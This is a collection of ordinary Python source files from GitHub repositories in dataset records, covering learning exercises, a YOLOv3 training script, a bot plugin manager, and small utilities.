print('班级名称:{},班级里有{}个学生,他们是'.format(self.name, len(self.stu_list)))\n for stu in self.stu_list:\n print(stu)\n\n def get_stuById(self, n):\n for stu in self.stu_list:\n if stu.id == n:\n return stu\n else:\n return '未找到学号为{}的学生'.format(n)\n\n def get_stuUnpass(self):\n if len(self.stu_list) != 0:\n # for stu in self.stu_list:\n # if stu.score < 60:\n # print(stu)\n result = filter(lambda student: student.score < 60, self.stu_list)\n for stu in result:\n print(stu)\n else:\n print(self.name + '班级里还没有学生')\n\n def order_by_score(self):\n if len(self.stu_list) != 0:\n self.stu_list.sort(key=lambda student: student.score, reverse=True)\n # sorted(self.stu_list, key=lambda s: s.score, reverse=True)\n return self.stu_list\n\n\ns1 = Student('1204001', '李明', 16, '男', 88)\ns2 = Student('1204002', '萧强', 15, '男', 60)\ns3 = Student('1204008', '韩梅梅', 17, '女', 72)\ns4 = Student('1204022', '王思锦', 16, '女', 58)\n\ng = Grade('软件一班', [s1, s2, s3, s4])\ng1 = Grade('软件二班')\n\n# print(s1)\n# g.get_student()\n# print(g.get_stuById('1204008'))\n# g.get_stuUnpass()\nx = g.order_by_score()\nfor i in x:\n print(i)\n\n# g1.get_student()\n# print(g1.get_stuById('1204001'))\n# g1.get_stuUnpass()\n# y = g1.order_by_score()\n# 
print(y)\n","repo_name":"Frecy16/learning","sub_path":"py_study/exceptionHandle/练习3.py","file_name":"练习3.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23802754798","text":"print(dir(__builtins__)) # those are classes and method that we have available in python\n\"\"\"\n['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BlockingIOError', 'BrokenPipeError', 'BufferError', \n'BytesWarning', 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError', 'ConnectionResetError', \n'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FileExistsError', 'FileNotFoundError', \n'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', \n'InterruptedError', 'IsADirectoryError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',\n'None', 'NotADirectoryError', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', \n'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError', 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', \n'StopAsyncIteration', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'TimeoutError', \n'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', \n'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__build_class__', '__debug__', '__doc__', '__import__', \n'__loader__', '__name__', '__package__', '__spec__', 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray', 'bytes', \n'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', \n'exec', 'exit', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', \n'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', \n'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', \n'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'vars', 'zip']\n\n\"\"\"\n\nhelp(zip)\n\"\"\"\nclass zip(object)\n | zip(*iterables) --> A zip object yielding tuples until an input is exhausted.\n | \n | >>> list(zip('abcdefg', range(3), range(4)))\n | [('a', 0, 0), ('b', 1, 1), ('c', 2, 2)]\n | \n | The zip object yields n-length tuples, where n is the number of iterables\n | passed as positional arguments to zip(). The i-th element in every tuple\n | comes from the i-th iterable argument to zip(). This continues until the\n | shortest argument is exhausted.\n | \n | Methods defined here:\n | \n | __getattribute__(self, name, /)\n | Return getattr(self, name).\n | \n | __iter__(self, /)\n | Implement iter(self).\n | \n | __next__(self, /)\n | Implement next(self).\n | \n | __reduce__(...)\n | Return state information for pickling.\n | \n | ----------------------------------------------------------------------\n | Static methods defined here:\n | \n | __new__(*args, **kwargs) from builtins.type\n | Create and return a new object. 
See help(type) for accurate signature.\n\n\nProcess finished with exit code 0\n\n\"\"\"\n\n# so we can build iterables to build tuples\n\nnumbers = [1,2,3]\nletters = ['a','b','c']\nmix = zip(numbers, letters)\nprint(mix)\n\"\"\"\nso we have an object type zip \n\n\"\"\"\nprint(list(mix))\n\"\"\"\n[(1, 'a'), (2, 'b'), (3, 'c')]\n\"\"\"\nprint(f' this is a tuple{tuple(zip(numbers, letters))}')\n\"\"\"\n this is a tuple((1, 'a'), (2, 'b'), (3, 'c'))\n\"\"\"\n\n# iterable with many elements at the same time\nfor numbers, letters in zip(numbers, letters):\n print(f'Numbers: {numbers}, Letters: {letters}')\n\n\"\"\"\nNumbers: 1, Letters: a\nNumbers: 2, Letters: b\nNumbers: 3, Letters: c\n\"\"\"\n\n\"\"\"\nnewList = []\nfor numbers, letters in zip(numbers, letters):\n newList.append(f'{numbers}-{letters}')\nprint(newList)\n\"\"\"\n\"\"\"\n\n['1-a', '2-b', '3-c']\n\"\"\"\n\n# unzip\nunmix = [(1,'a'),(2,'b'),(3,'c')]\nun_numbers, un_letters = zip(*unmix)\nprint(f'Number {un_numbers} and letters {un_letters}')\n\"\"\"\nNumber (1, 2, 3) and letters ('a', 'b', 'c') \n\"\"\"\n\n# create a dictionary from list\n\nmykeys = ['Name', 'Las name', 'Age']\nvalues = ['Michael', 'Fernández', 18]\nmydictionary = dict(zip(mykeys, values))\nprint(mydictionary)\n\"\"\"\n{'Name': 'Michael', 'Las name': 'Fernández', ' Age': 18}\n\"\"\"\n\n# update a element from our dictionary\nthiskey = ['Age']\nnew_age = [45]\nmydictionary.update(zip(thiskey, new_age))\nprint(mydictionary)\n\"\"\"\n{'Name': 'Michael', 'Las name': 'Fernández', 'Age': 45}\n\"\"\"","repo_name":"deanminik/python","sub_path":"venv/zip-function/zip_function.py","file_name":"zip_function.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74044655607","text":"from os import path as os_path\r\nfrom typing import Any, Dict\r\n\r\nfrom yaml import safe_dump as yaml_dump\r\nfrom yaml import safe_load as yaml_load\r\n\r\n_DEFAULT_CONFIG = {\r\n \"version\": \"v0.1.0\",\r\n \"base_path\": \"./app\",\r\n \"deploy\": {\r\n \"debug\": False,\r\n \"enable_PyWebIO_CDN\": False,\r\n \"PyWebIO_CDN\": \"\",\r\n \"PyEcharts_CDN\": \"\",\r\n \"port\": 8080,\r\n },\r\n \"queue_processor\": {\r\n \"check_interval\": 10,\r\n \"threads\": 3,\r\n },\r\n \"fetcher\": {\r\n \"sleep_interval_low\": 0,\r\n \"sleep_interval_high\": 0,\r\n },\r\n \"general_analyzer\": {\r\n \"analyze_interval\": 3600,\r\n },\r\n \"footer\": \"\",\r\n \"word_split_ability\": {\r\n \"host\": \"localhost\",\r\n \"port\": 6001,\r\n },\r\n \"db\": {\r\n \"host\": \"localhost\",\r\n \"port\": 27017,\r\n \"main_database\": \"WD2022Data\",\r\n },\r\n \"log\": {\r\n \"minimum_record_level\": \"DEBUG\",\r\n \"minimum_print_level\": \"INFO\",\r\n },\r\n}\r\n\r\n\r\nclass Config:\r\n def __new__(cls) -> \"Config\":\r\n # 单例模式\r\n if not hasattr(cls, \"_instance\"):\r\n cls._instance = object.__new__(cls)\r\n return cls._instance\r\n\r\n def __init__(self) -> None:\r\n if not os_path.exists(\"config.yaml\"): # 没有配置文件\r\n with open(\"config.yaml\", \"w\", encoding=\"utf-8\") as f:\r\n yaml_dump(\r\n _DEFAULT_CONFIG,\r\n f,\r\n allow_unicode=True,\r\n indent=4,\r\n sort_keys=False,\r\n )\r\n self._data = _DEFAULT_CONFIG\r\n else: # 有配置文件\r\n with open(\"config.yaml\", encoding=\"utf-8\") as f:\r\n self._data = yaml_load(f)\r\n\r\n def __getattr__(self, name: str) -> Any:\r\n result: Any = self._data[name]\r\n if isinstance(result, dict):\r\n return ConfigNode(result)\r\n\r\n return result\r\n\r\n def 
refresh(self) -> None:\r\n        self.__init__()\r\n\r\n\r\nclass ConfigNode:\r\n    def __init__(self, data: Dict[str, Any]) -> None:\r\n        self._data: Dict[str, Any] = data\r\n\r\n    def __getattr__(self, name: str) -> Any:\r\n        return self._data[name]\r\n\r\n\r\ndef init_config() -> Config:\r\n    return Config()  # initialise the config singleton\r\n\r\n\r\nconfig = init_config()\r\n","repo_name":"FHU-yezi/WriteDown2022","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"42199984908","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.fftpack as sfft\r\nfrom matplotlib import image as mpimg\r\n\r\n\r\nimg = mpimg.imread(\"Fruit.jpg\")\r\nplt.imshow(img)\r\nplt.show()\r\n\r\n#fft\r\nimgf = sfft.fft2(img)\r\nplt.imshow(np.abs(imgf))\r\nplt.show()\r\n#image with fft shift\r\nimgf = sfft.fftshift(imgf)\r\nplt.imshow(np.abs(imgf))\r\nplt.show()\r\n\r\n#inverse fft\r\nimg1 = sfft.ifft2(imgf)\r\nplt.imshow(np.abs(img1))\r\nplt.show()\r\n\r\n#remove high frequencies (keep only the disc of radius r around the centred DC term)\r\nimgf1 = np.zeros((360,360),dtype=complex)\r\nc = 180\r\nr = 50\r\nfor m in range(0,360):\r\n    for n in range(0,360):\r\n        if (np.sqrt(((m-c)**2 + (n-c)**2)) < r):\r\n            imgf1[m,n] = imgf[m,n]\r\n\r\nplt.imshow(np.abs(imgf1))\r\nplt.show()\r\nimg1 = sfft.ifft2(imgf1)\r\nplt.imshow(np.abs(img1))\r\nplt.show()\r\n\r\n","repo_name":"alfanashfak2001/python_maths","sub_path":"Question_04_a.py","file_name":"Question_04_a.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"38033879754","text":"from common.models.crm import Group, UserGroup\n\n\ndef get_user_group(user_id):\n    \"\"\"\n    Get the groups that a single user belongs to\n    :param user_id:\n    :return:\n    \"\"\"\n    user_groups = UserGroup.query.filter_by(user_id=user_id).all()\n    group_list = []\n    for user_group in user_groups:\n        group_detail = {}\n        group = Group.query.filter_by(id=user_group.group_id).first()\n        group_detail[\"group_id\"] = group.id\n        group_detail[\"name\"] = group.name\n\n        group_list.append(group_detail)\n\n    return group_list\n\n\n","repo_name":"Enzozzzz/crm","sub_path":"common/utils/rbac/get_groups.py","file_name":"get_groups.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"}
{"seq_id":"72797588409","text":"\r\n# class Node():\r\n#     def __init__(self, parent=None, position=None, label=None):\r\n#         self.parent = parent\r\n#         self.position = position\r\n#         self.label = label\r\n\r\n#         self.g = 0\r\n#         self.h = 0\r\n#         self.f = 0\r\n\r\n#     def __eq__(self, other):\r\n#         return self.position == other.position\r\n\r\n# def astar(list_of_point, labels, mat_adj):\r\n\r\n#     open_list = []\r\n#     closed_list = []\r\n#     visited_list = []\r\n    \r\n#     start_node = Node(None, list_of_point[0], labels[0])\r\n#     start_node.g = start_node.h = start_node.f = 0\r\n    \r\n#     end_node = Node(None, list_of_point[-1], labels[-1])\r\n#     end_node.g = end_node.h = end_node.f = 0\r\n    \r\n#     open_list.append(start_node)\r\n    \r\n#     while len(open_list) > 0:\r\n#         current_node = open_list[0]\r\n#         current_index = 0\r\n#         for index, item in enumerate(open_list):\r\n#             if item.f < current_node.f:\r\n#                 current_node = item\r\n#                 current_index = index\r\n    \r\n#         del open_list[current_index]\r\n#         closed_list.append(current_node)\r\n#         visited_list.append(current_node.position)\r\n    \r\n#         print(\"cur\")\r\n#         for node in open_list:\r\n# 
print(node.label)\r\n#         # Found the goal\r\n#         if current_node == end_node:\r\n#             path = []\r\n#             current = current_node\r\n#             while current is not None:\r\n#                 path.append(current.label)\r\n#                 current = current.parent\r\n#             return path[::-1] # Return reversed path\r\n    \r\n#         children = []\r\n#         neighbour_index = 0\r\n#         print(current_index)\r\n#         for bool in mat_adj[current_index]:\r\n#             if bool == 1 and list_of_point[neighbour_index] not in visited_list:\r\n#                 child_node = Node(current_node, list_of_point[neighbour_index], labels[neighbour_index])\r\n#                 children.append(child_node)\r\n#             neighbour_index += 1\r\n    \r\n#         for child in children:\r\n    \r\n#             for closed_child in closed_list:\r\n#                 if child == closed_child:\r\n#                     continue\r\n    \r\n#             # Create the f, g, and h values\r\n#             # child.g = current_node.g + haversineDistance(current_node.position, child.position)\r\n#             # child.h = haversineDistance(end_node.position, current_node.position)\r\n#             # child.f = child.g + child.h\r\n\r\n#             # Child is already in the open list\r\n#             for open_node in open_list:\r\n#                 if child == open_node and child.g > open_node.g:\r\n#                     continue\r\n\r\n#             # Add the child to the open list\r\n#             open_list.append(child)\r\ndef perms(size):\r\n    dasar = tuple(range(1, size+1))\r\n    length = size\r\n\r\n    maxnumberofiter = 1  # factorial accumulator must start at 1, not 0\r\n    for i in range(1,size+1):\r\n        maxnumberofiter *= i  # size! permutations in total\r\n\r\n    arrayofnum = []\r\n    for i in range(length):\r\n        arrayofnum.append(i)\r\n\r\n    perulangan = []\r\n    for i in range(length, length-size, -1):\r\n        perulangan.append(i)\r\n\r\n    yield list(dasar[i] for i in arrayofnum[:size])\r\n\r\n    count = 0\r\n    while True:  # terminates through the 'return' in the for-else below\r\n        for i in range(size-1, -1, -1):\r\n            perulangan[i] -= 1\r\n            count += 1\r\n            if perulangan[i] == 0:\r\n                arrayofnum[i:] = arrayofnum[i+1:]+arrayofnum[i:i+1]\r\n                perulangan[i] = length - i\r\n            else:\r\n                j = perulangan[i]\r\n                swap(arrayofnum, i, -j)\r\n                yield list(dasar[i] for i in arrayofnum[:size])\r\n                break\r\n        else:\r\n            return\r\n\r\ndef swap(arr, i, j):\r\n    temp = arr[i]\r\n    arr[i] = arr[j]\r\n    arr[j] = temp\r\n    return","repo_name":"kahfizulkifli/mathdoku","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11189172637","text":"import os\n\n# Directory where the files are located\ndirectory = \"card_images\"\n\n# Change to the directory\nos.chdir(directory)\n\n# Mapping of card ranks to their corresponding names\nrank_mapping = {\n    \"6\": \"6\",\n    \"7\": \"7\",\n    \"8\": \"8\",\n    \"9\": \"9\",\n    \"10\": \"10\",\n    \"11\": \"jack\",\n    \"12\": \"queen\",\n    \"13\": \"king\",\n    \"1\": \"ace\",\n}\n\n# Mapping of card suits to their corresponding names\nsuit_mapping = {\n    \"diamond\": \"diamonds\",\n    \"heart\": \"hearts\",\n    \"spade\": \"spades\",\n    \"club\": \"clubs\",\n}\n\n# Iterate through each file in the directory\nfor suit in suit_mapping:\n    os.chdir(suit)\n    for filename in os.listdir(\".\"):\n        # Check if the file is a regular file\n        if os.path.isfile(filename):\n            # Check if the file has a valid name to be renamed\n            rank = os.path.splitext(filename)[0]\n            if rank in rank_mapping and os.path.splitext(filename)[1] == \".png\":\n                # Construct the new filename with suit and rank\n                new_filename = f\"{suit_mapping[suit]}_{rank_mapping[rank]}.png\"\n\n                # Rename the file\n                os.rename(filename, new_filename)\n                print(f\"Renamed: {filename} -> {new_filename}\")\n            # Check if the file ends with \".svg\" and delete it\n            elif filename.endswith(\".svg\") or rank 
not in rank_mapping:\n os.remove(filename)\n print(f\"Deleted: {filename}\")\n os.chdir(\"..\")\n","repo_name":"SkylerMime/NinetyNine","sub_path":"ninety_nine/file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73747833530","text":"class BST:\n def __init__(self, data):\n self.data = data\n self.left = None \n self.right = None \n\n def addNode(self, data):\n if self.data == data:\n return \n\n if data < self.data:\n if self.left:\n self.left.addNode(data)\n else:\n self.left = BST(data)\n else:\n if self.right:\n self.right.addNode(data)\n else:\n self.right = BST(data)\n\n\n def search(self, data):\n if self.data == data: return True \n\n if data < self.data:\n if self.left:\n return self.left.search(data)\n else:\n return False \n else:\n if self.right:\n return self.right.search(data)\n else:\n return False \n\n \n def InorderTraversal(self):\n elements = []\n if self.left:\n elements += self.left.InorderTraversal()\n elements.append(self.data)\n if self.right:\n elements += self.right.InorderTraversal()\n return elements\n\n\ndef BuildTree(elem):\n bst = BST(elem[0])\n for x in range(1, len(elem)):\n bst.addNode(elem[x])\n return bst\n\n \n\n\nif __name__ == \"__main__\":\n elem = [17,16,5,2,1,90,66,77]\n bst = BuildTree(elem)\n print(bst.InorderTraversal())\n ","repo_name":"BALAVIGNESHDOSTRIX/PyExpert","sub_path":"Datastructures/bst-dfs.py","file_name":"bst-dfs.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15743896782","text":"# coding:utf8\n\n\nimport os\nimport imp\nimport time\nimport types\nimport random\nimport traceback\n\nfrom .. 
import utils\n\n\ndef default_plugin__accept_request(self, msg, rsp, utils, *args, **kwargs):\n if msg.was_appeal and msg.args[0].lower() in self.keywords:\n return True\n\n return False\n\n\nclass Pluginmanager(object):\n def __init__(self, bot, vkr):\n self.plugins = {}\n self.plugin_list = []\n self.builtin_plugin_list = []\n self.custom_plugin_list = []\n self.log = lambda *x, **y: None\n self.bot = bot\n self.utils = PluginUtils(self, self.bot, vkr, self.log)\n\n def plugin_respond(self, msg, rsp):\n for name in self.plugin_list:\n if not self.plugins[name]._accept_request(msg, rsp, self.utils):\n continue\n\n user_access_level = self.utils.get_user_access_level(msg)\n\n if user_access_level < self.plugins[name].protection:\n rsp.text = (\n u'Для использования команды необходим уровень доступа %d.\\n'\n u'Ваш уровень доступа: %d'\n % (self.plugins[name].protection, user_access_level)\n )\n break\n\n if self.plugins[name].argument_required:\n if len(msg.args) < 2:\n rsp.text = \\\n u'Эту команду можно использовать только с аргументом'\n break\n\n rsp = self.plugins[name].respond(msg, rsp, self.utils)\n break\n\n return rsp\n\n def load_plugins(self):\n self.plugins = {}\n self.plugin_list = []\n self.builtin_plugin_list = []\n self.custom_plugin_list = []\n\n if not os.path.exists(utils.CUSTOM_PLUGIN_DIR):\n self.log(\n u'Создание директории для пользовательских плагинов: %s ...'\n % utils.CUSTOM_PLUGIN_DIR, 1\n )\n os.mkdir(utils.CUSTOM_PLUGIN_DIR)\n\n self.log(u'Чтение встроенных плагинов ...', 0)\n self._load_plugins_from(utils.PLUGIN_DIR)\n\n for p in self.plugins:\n self.builtin_plugin_list.append(p)\n\n self.log(u'Чтение пользовательских плагинов ...', 1)\n self._load_plugins_from(utils.CUSTOM_PLUGIN_DIR)\n\n for p in sorted(self.plugins, key=lambda x: self.plugins[x].priority,\n reverse=True):\n self.plugin_list.append(p)\n\n self.builtin_plugin_list = set(self.builtin_plugin_list)\n\n self.custom_plugin_list = \\\n set(set(self.plugin_list) - self.builtin_plugin_list)\n\n self.log(\n u'Загружены плагины: [b]%s[/b]' % ', '.join(self.plugin_list), 0)\n\n def _load_plugins_from(self, path):\n files = sorted(os.listdir(path)) # sorting to ensure that .py goes first\n included = []\n\n for f in files:\n if f.startswith('plugin_'):\n try:\n if f.endswith('.py'):\n if f + 'c' in files:\n if os.path.getmtime(os.path.join(path, f + 'c')) > os.path.getmtime(os.path.join(path, f)):\n # .pyc newer\n continue\n\n elif f + 'o' in files:\n if os.path.getmtime(os.path.join(path, f + 'o')) > os.path.getmtime(os.path.join(path, f)):\n # .pyo newer\n continue\n\n self._add_plugin(\n imp.load_source('', os.path.join(path, f)), f, f[7:-3])\n\n included.append(f)\n\n elif f.endswith('.pyc') or f.endswith('.pyo'):\n if f[:-1] in included:\n continue\n\n if f.endswith('c') and f[:-1] + 'o' in files:\n if os.path.getmtime(os.path.join(path, f[:-1] + 'o')) > os.path.getmtime(os.path.join(path, f)):\n # .pyo newer\n continue\n elif f[:-1] + 'c' in files:\n if os.path.getmtime(os.path.join(path, f[:-1] + 'c')) > os.path.getmtime(os.path.join(path, f)):\n # .pyc newer\n continue\n\n self._add_plugin(\n imp.load_compiled('', os.path.join(path, f)), f, f[7:-4])\n\n included.append(f[:-1])\n\n except Exception:\n self.log(u'[b]Ошибка при загрузке плагина %s[/b]' % f, 2)\n self.log(traceback.format_exc().decode('utf8'), 2)\n\n def _add_plugin(self, plugin, f, name):\n p = plugin.Plugin()\n\n if getattr(p, 'disabled', False):\n return\n\n if getattr(p, 'name', None) is None:\n self.log(\n u'[b]Предупреждение: 
отсутствует имя модуля %s. Использую %s[/b]' \n % (f, name), 1\n )\n p.name = name\n\n if len(getattr(p, 'keywords', ())) == 0:\n self.log(u'[b]Ошибка: Нет ключевых слов для модуля %s[/b]' % f, 1)\n return\n \n if getattr(p, '__doc__', None) is None:\n self.log(\n u'[b]Предупреждение: модуль %s не имеет документации[/b]' % f, 1\n )\n p.__doc__ = ''\n\n if not hasattr(p, 'protection'):\n self.log(\n u'[b]Предупреждение: модуль %s не имеет информации о защите. '\n u'Использую 0[/b]' % f, 1\n )\n p.protection = 0\n\n if not hasattr(p, 'argument_required'):\n self.log(\n u'[b]Предупреждение: модуль %s не имеет информации о '\n u'необходимости аргумента. Использую False[/b]' % f, 1\n )\n p.argument_required = False\n\n if not hasattr(p, 'priority'):\n p.priority = 0\n\n if not hasattr(p, '_accept_request'):\n p._accept_request = \\\n types.MethodType(default_plugin__accept_request, p)\n\n if p.name in self.plugins:\n self.log(\n u'Предупреждение: модуль [b]%s[/b] будет переназначен ...' %\n p.name, 1)\n\n if p.name in self.builtin_plugin_list:\n self.builtin_plugin_list.remove(p.name)\n\n if p.name in self.custom_plugin_list:\n self.custom_plugin_list.remove(p.name)\n\n self.plugins[name] = p\n\n def set_logging_function(self, logging_function):\n self.log = logging_function\n self.utils.log = logging_function\n self.log(u'Подключена функция логгирования для менеджера плагинов', 0)\n\n\nclass PluginUtils(object):\n \"\"\"This class contains all nesessary utils for plugins\n \"\"\"\n\n def __init__(self, pm, bot, vkr, log):\n self.__pm = pm\n self.__bot = bot\n self.vkr = vkr\n self.log = log\n\n def get_settings(self):\n return self.__bot.settings\n\n def get_blacklist(self):\n return self.__bot.blacklist\n\n def get_whitelist(self):\n return self.__bot.whitelist\n\n def get_custom_commands(self):\n return self.__bot.custom_commands\n\n def get_settings(self, keys, section='Plugins'):\n return utils.get_settings(keys, section=section)\n\n def save_setting(self, key, val, section='Plugins'):\n self.log(u'Обновляю настройки: %s=%s' % (key, val), 0)\n utils.save_setting(key, val, section=section)\n\n if key in self.__bot.settings:\n self.__bot.settings[key] = val\n\n self.__bot.is_settings_changed = True\n\n def save_blacklist(self, blacklist):\n utils.save_blacklist(blacklist)\n self.__bot.blacklist = blacklist\n\n def save_whitelist(self, whitelist):\n utils.save_whitelist(whitelist)\n self.__bot.whitelist = whitelist\n\n def save_custom_commands(self, custom_commands):\n utils.save_custom_commands(custom_commands)\n self.__bot.custom_commands = custom_commands\n\n def clear_message_queue(self):\n self.__bot.mlpd = None\n\n def get_user_access_level(self, msg):\n whitelist = self.get_whitelist()\n\n if msg.out:\n user_access_level = 4\n elif msg.real_user_id in whitelist:\n user_access_level = whitelist[msg.real_user_id]\n else:\n user_access_level = 0\n\n return user_access_level\n\n def safe_format(self, *args, **kwargs):\n return utils.safe_format(*args, **kwargs)\n\n def get_plugin_list(self):\n return self.__pm.plugin_list\n\n def get_builtin_plugin_list(self):\n return self.__pm.builtin_plugin_list\n\n def get_custom_plugin_list(self):\n return self.__pm.custom_plugin_list\n\n def get_plugin(self, name):\n return self.__pm.plugins[name] if name in self.__pm.plugin_list else None\n\n def stop_bot(self):\n self.log(u'Вызов функции остановки', 0)\n self.__bot.runtime_error = 0\n\n def set_startup_response(self, response):\n self.__bot.startup_response = response\n\n def restart_bot(self):\n 
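# note (inferred from stop_bot above, not stated in the original code):\n        # runtime_error acts as a control code polled by the bot's main loop,\n        # 0 requesting a stop and 1 requesting a restart\n        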
self.log(u'Вызов функции перезагрузки', 0)\n self.__bot.runtime_error = 1","repo_name":"Fogapod/VKBot","sub_path":"bot/plugins/pluginmanager.py","file_name":"pluginmanager.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"77"} +{"seq_id":"38995874913","text":"import tensorflow as tf\nfrom core import utils, yolov3\nfrom core.dataset import dataset, Parser\nsess = tf.Session()\n\nIMAGE_H, IMAGE_W = 416, 416\nBATCH_SIZE = 8\nSTEPS = 2500\nLR = 0.001 # if Nan, set 0.0005, 0.0001\nDECAY_STEPS = 100\nDECAY_RATE = 0.9\nSHUFFLE_SIZE = 200\nCLASSES = utils.read_coco_names('./data/raccoon.names')\nANCHORS = utils.get_anchors('./data/raccoon_anchors.txt', IMAGE_H, IMAGE_W)\nNUM_CLASSES = len(CLASSES)\nEVAL_INTERNAL = 100\nSAVE_INTERNAL = 500\n\ntrain_tfrecord = \"./raccoon_dataset/raccoon_train.tfrecords\"\ntest_tfrecord = \"./raccoon_dataset/raccoon_test.tfrecords\"\n\nparser = Parser(IMAGE_H, IMAGE_W, ANCHORS, NUM_CLASSES)\ntrainset = dataset(parser, train_tfrecord, BATCH_SIZE, shuffle=SHUFFLE_SIZE)\ntestset = dataset(parser, test_tfrecord , BATCH_SIZE, shuffle=None)\n\nis_training = tf.placeholder(tf.bool)\nexample = tf.cond(is_training, lambda: trainset.get_next(), lambda: testset.get_next())\n\nimages, *y_true = example\nmodel = yolov3.yolov3(NUM_CLASSES, ANCHORS)\n\nwith tf.variable_scope('yolov3'):\n pred_feature_map = model.forward(images, is_training=is_training)\n loss = model.compute_loss(pred_feature_map, y_true)\n y_pred = model.predict(pred_feature_map)\n\ntf.summary.scalar(\"loss/coord_loss\", loss[1])\ntf.summary.scalar(\"loss/sizes_loss\", loss[2])\ntf.summary.scalar(\"loss/confs_loss\", loss[3])\ntf.summary.scalar(\"loss/class_loss\", loss[4])\n\nglobal_step = tf.Variable(0, trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])\nwrite_op = tf.summary.merge_all()\nwriter_train = tf.summary.FileWriter(\"./data/train\")\nwriter_test = tf.summary.FileWriter(\"./data/test\")\n\nsaver_to_restore = tf.train.Saver(var_list=tf.contrib.framework.get_variables_to_restore(include=[\"yolov3/darknet-53\"]))\nupdate_vars = tf.contrib.framework.get_variables_to_restore(include=[\"yolov3/yolo-v3\"])\nlearning_rate = tf.train.exponential_decay(LR, global_step, decay_steps=DECAY_STEPS, decay_rate=DECAY_RATE, staircase=True)\noptimizer = tf.train.AdamOptimizer(learning_rate)\n\n# set dependencies for BN ops\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\nwith tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(loss[0], var_list=update_vars, global_step=global_step)\n\nsess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\nsaver_to_restore.restore(sess, \"./checkpoint/yolov3.ckpt\")\nsaver = tf.train.Saver(max_to_keep=2)\n\nfor step in range(STEPS):\n run_items = sess.run([train_op, write_op, y_pred, y_true] + loss, feed_dict={is_training:True})\n\n if (step+1) % EVAL_INTERNAL == 0:\n train_rec_value, train_prec_value = utils.evaluate(run_items[2], run_items[3])\n\n writer_train.add_summary(run_items[1], global_step=step)\n writer_train.flush() # Flushes the event file to disk\n if (step+1) % SAVE_INTERNAL == 0: saver.save(sess, save_path=\"./checkpoint/yolov3.ckpt\", global_step=step+1)\n\n print(\"=> STEP %10d [TRAIN]:\\tloss_xy:%7.4f \\tloss_wh:%7.4f \\tloss_conf:%7.4f \\tloss_class:%7.4f\"\n %(step+1, run_items[5], run_items[6], run_items[7], run_items[8]))\n\n run_items = sess.run([write_op, y_pred, y_true] + loss, feed_dict={is_training:False})\n if 
(step+1) % EVAL_INTERNAL == 0:\n test_rec_value, test_prec_value = utils.evaluate(run_items[1], run_items[2])\n print(\"\\n=======================> evaluation result <================================\\n\")\n print(\"=> STEP %10d [TRAIN]:\\trecall:%7.4f \\tprecision:%7.4f\" %(step+1, train_rec_value, train_prec_value))\n print(\"=> STEP %10d [VALID]:\\trecall:%7.4f \\tprecision:%7.4f\" %(step+1, test_rec_value, test_prec_value))\n print(\"\\n=======================> evaluation result <================================\\n\")\n\n writer_test.add_summary(run_items[0], global_step=step)\n writer_test.flush() # Flushes the event file to disk\n\n","repo_name":"HulkMaker/tensorflow-slim-yolov3","sub_path":"quick_train.py","file_name":"quick_train.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"36634840349","text":"from tkinter import *\nimport pyshorteners\nimport pyperclip\n\n\nroot = Tk()\nroot.title('ShortLink')\nroot.configure(bg='#BABCA8')\nw = 200\nh = 200\nx = root.winfo_screenwidth()\ny = root.winfo_screenheight()\nx = 